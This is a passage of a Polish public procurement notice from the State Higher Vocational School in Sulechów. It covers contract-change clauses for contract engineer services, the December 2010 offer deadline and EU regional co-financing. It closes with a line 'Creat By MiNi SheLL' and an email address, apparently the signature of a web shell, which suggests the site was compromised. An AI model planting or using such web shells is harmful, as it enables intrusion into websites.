d) w przypadku, gdy realizacja robót budowlanych przedłuży się ponad okres obowiązywania Umowy lub okres udzielonej gwarancji na prace, który będzie dłuższy niż okres obowiązywania niniejszej Umowy, termin realizacji Umowy w zakresie czynności nadzoru w okresie gwarancji na prace ulegnie przedłużeniu, o okres realizacji tych czynności,
e) w wyniku wcześniejszego zakończenia realizacji przedmiotu umowy, termin zakończenia umowy może ulec skróceniu, jednak wykonawca zobowiązany jest w ciągu 2 miesięcy rozliczyć inwestycję.
f) zmiany danych osobowych - zmiany osób, tj. przedstawicieli Inżyniera Kontraktu, co wymaga zawarcia stosownego aneksu do Umowy przez strony.
g)  w przypadku ustawowej zmiany podatku VAT.
6. Zmiany warunków Umowy, które nie wymagają sporządzenia Aneksu do Umowy to: 
a) zmiana terminów, zakresu rzeczowego robót oraz usług Inżyniera Kontraktu określonych w Harmonogramie rzeczowo-finansowym, 
b) zmiana w zakresie wykonywania czynności Inżyniera Kontraktu, która będzie obowiązywała pod warunkiem wydania pisemnego polecenia wykonania, bądź odstąpienia od wykonania,
c) zmiana w zakresie zawartości dokumentów (zgodnie z § 7 Umowy), która może być dokonywana na pisemne polecenie Zamawiającego,
d) zmiana postanowień niniejszej Umowy na skutek zmiany powszechnie obowiązującego prawa,
e) zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana nr rachunku bankowego),
f) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami,

Wszystkie powyższe postanowienia opisane w ust. 5 do ust. 9 stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. Warunkiem dokonania zmian postanowień zawartej Umowy w formie aneksu do Umowy jest zgoda obu stron wyrażona na piśmie, pod rygorem nieważności zmiany.
Ponadto zamawiający dopuszcza zmiany, o których mowa w § 18. wzoru umowy staowiacym załącznik nr 9 do siwz.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pwsz.sulechow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Wyższa Szkoła Zawodowa w Sulechowie, ul. Armii Krajowej 48, pok. 104, 66-100 Sulechów..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2010 godzina 11:30, miejsce: Państwowa Wyższa Szkoła Zawodowa w Sulechowie, ul. Armii Krajowej 48, pok. 104, 66-100 Sulechów..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane z Lubuskiego Regionalnego Programu Operacyjnego na lata 2007-2013, Priorytet 2: Stymulowanie wzrostu inwestycji w przedsiębiorstwach i wzmocnienie potencjału innowacyjnego. Działanie 2.4 Transfer badań, nowoczesnych technologii i innowacji ze świata nauki do przedsiębiorstw.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com